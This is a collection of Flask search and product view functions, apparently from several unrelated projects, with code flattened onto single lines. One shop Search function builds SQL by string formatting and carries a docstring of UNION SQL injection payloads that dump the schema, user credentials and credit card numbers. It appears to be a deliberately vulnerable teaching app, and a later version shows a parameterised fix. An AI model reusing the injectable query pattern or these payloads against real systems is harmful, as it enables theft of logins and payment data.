def search(): journals = Journal.query.all() form = SearchForm(request.form) if request.method == 'POST' and form.validate(): keyword = form.keyword.data return render_template('search/search.html', journals=journals, form=form)
def search(): albums = Album.query.all() artists = Artist.query.all() form = SearchForm(request.form) if request.method == 'POST' and form.validate(): keyword = form.keyword.data return render_template('search/search.html', albums=albums, artists=artists, form=form)
def Search(product): if 'username' in session: user = User(session['username'], session['email'], session['password'], session['question'], session['answer']) else: user = None # For search conn = sqlite3.connect(os.path.join(file_directory, "storage.db")) c = conn.cursor() c.execute( "SELECT rowid, * FROM products WHERE name = '{}' ".format(product)) results = c.fetchall() print(results) conn.close() """ UNION SQL INJECTION EXFILTRATE DB SCHEMA ' UNION SELECT * FROM x-- (Error: No such table x) ' UNION SELECT '1' FROM sqlite_master-- (Error: SELECTs to the left and right of UNION do not have the same number of result columns) ' UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8' FROM sqlite_master-- (Returns all products) ' UNION SELECT '1', sql, '3', '4', '5', '6', '7', '8' FROM sqlite_master-- (Returns all tables in schema) (After knowing fields in user table) GET ALL USER CREDENTIALS ' UNION SELECT '1', username, '3', '4', password, '6', '7', '8' FROM users-- GET CREDIT CARD DETAILS ' UNION SELECT '1', ccnumber, '3', '4', cvv, '6', '7', '8' FROM paymentdetails-- GET HIDDEN PRODUCTS ' UNION SELECT rowid, name, image, '4', cost_price, '6', '7', '8' FROM products-- """ # Search Form form = SearchForm(request.form) if request.method == "POST": # Pass prodduct into url directly (Weak code) return redirect(url_for('shopping.Search', product=form.Search.data)) return render_template("shopping/Search.html", user=user, products=results, search=product, form=form)
def Products(): if 'username' in session: user = User(session['username'], session['email'], session['password'], session['question'], session['answer']) else: user = None conn = sqlite3.connect(os.path.join(file_directory, "storage.db")) c = conn.cursor() c.execute("SELECT rowid, * FROM products") products = c.fetchall() conn.close() search = SearchForm(request.form) if request.method == "POST": # Pass product into url directly (Weak code) return redirect(url_for('shopping.Search', product=search.Search.data)) return render_template("shopping/Products.html", user=user, form=search, products=products)
def Products(): try: current_user.get_username() user = current_user except: user = None conn = sqlite3.connect(os.path.join(file_directory, "storage.db")) c = conn.cursor() c.execute("SELECT * FROM products") products = c.fetchall() conn.close() search = SearchForm(request.form) if request.method == "POST": return redirect(url_for('shopping.Search', product=search.Search.data)) return render_template("shopping/Products.html", user=user, form=search, products=products)
def home(): # Get the results from the forms form = SearchForm(request.form) if request.method == 'POST': # Set form values to session cookie session['searchType'] = form.searchType.data session['searchText'] = form.searchText.data return redirect(url_for('searchResults')) # Generate 5 random beer id to show on the home page randBeers = [] for i in range(0, 5): randID = int(round(random.random() * 253,0)) randBeers.append(randID); # Get 5 beers from the beers table query = """SELECT beers.beer_id, beers.name, beers.abv, beer_types.name, brewers.name FROM beers INNER JOIN brewers ON beers.brewer_id = brewers.brewer_id INNER JOIN beer_types ON beers.type_id = beer_types.type_id WHERE beer_id IN (%s,%s,%s,%s,%s) AND beers.inactive = 0;""" %(randBeers[0],randBeers[1],randBeers[2],randBeers[3],randBeers[4]) results = db_connect.execute_query(query) # Create object for data returned payload = [] content = {} for result in results: abv = result[2] * 100 abvStr = str(abv) + '%' content = {'beer_id': result[0], 'name': result[1], 'abv': abvStr, 'style': result[3], 'brewer': result[4], 'route': 'home', 'order': '+'} payload.append(content) randBeersTable = RandomTable(payload) return render_template('home.html', title='Home', form=form,randBeersTable=randBeersTable)
def Search(product): try: current_user.get_username() user = current_user except: user = None # For search conn = sqlite3.connect(os.path.join(file_directory, "storage.db")) c = conn.cursor() c.execute("SELECT rowid, * FROM products WHERE name=? ", (product, )) results = c.fetchall() conn.close() # Search Form form = SearchForm(request.form) if request.method == "POST": return redirect(url_for('shopping.Search', product=form.Search.data)) return render_template("shopping/Search.html", user=user, products=results, search=product, form=form)
def search(): form = SearchForm(request.form) map = None if request.method == 'POST' and form.validate(): from flask_googlemaps import GoogleMaps, Map devices_data = {} # dict to store data of devices devices_location = {} # dict to store coordinates of devices # json_data = request.get_json(silent=True) # get json request kensa = form.kensa.data chiryo = form.chiryo.data shikkan = form.shikkan.data area = form.area.data from_time = form.from_time.data to_time = form.to_time.data hospital = Hospitals.query.first() json_data = { # for testing 'user': { 'x': 35.94149, 'y': 139.771598 }, 'devices': [{ 'id': '0001', 'x': hospital.latitude, 'y': hospital.longitude, 'data': 'something' }] } user_location = (json_data['user']['x'], json_data['user']['y']) # json example : { 'user' : { 'x' : '300' , 'y' : '300' } } # get user_location from json & store as turple (x, y) devices_data[str( json_data['devices'][0]['id'])] = (json_data['devices'][0]['data']) devices_location[str( json_data['devices'][0]['id'])] = (json_data['devices'][0]['x'], json_data['devices'][0]['y']) # json example : { 'devices' : { 'id' : '0001', x' : '500', 'y' : '500' }, { ... } } # get device_location from json & store turple (x, y) in dictionary with device id as key # use for statements or something to get more locations from more devices circle = { # draw circle on map (user_location as center) 'stroke_color': '#0000FF', 'stroke_opacity': .5, 'stroke_weight': 5, # line(stroke) style 'fill_color': '#FFFFFF', 'fill_opacity': .2, # fill style 'center': { # set circle to user_location 'lat': user_location[0], 'lng': user_location[1] }, 'radius': 100 # circle size (50 meters) } map = Map( identifier="map", varname="map", # set identifier, varname lat=user_location[0], lng=user_location[1], # set map base to user_location zoom=12, # set zoomlevel markers=[{ 'lat': devices_location['0001'][0], 'lng': devices_location['0001'][1], 'infobox': devices_data['0001'] }], # set markers to location of devices circles=[circle] # pass circles ) return render_template('search.html', map=map, form=form, hospital=hospital) return render_template('search.html', form=form)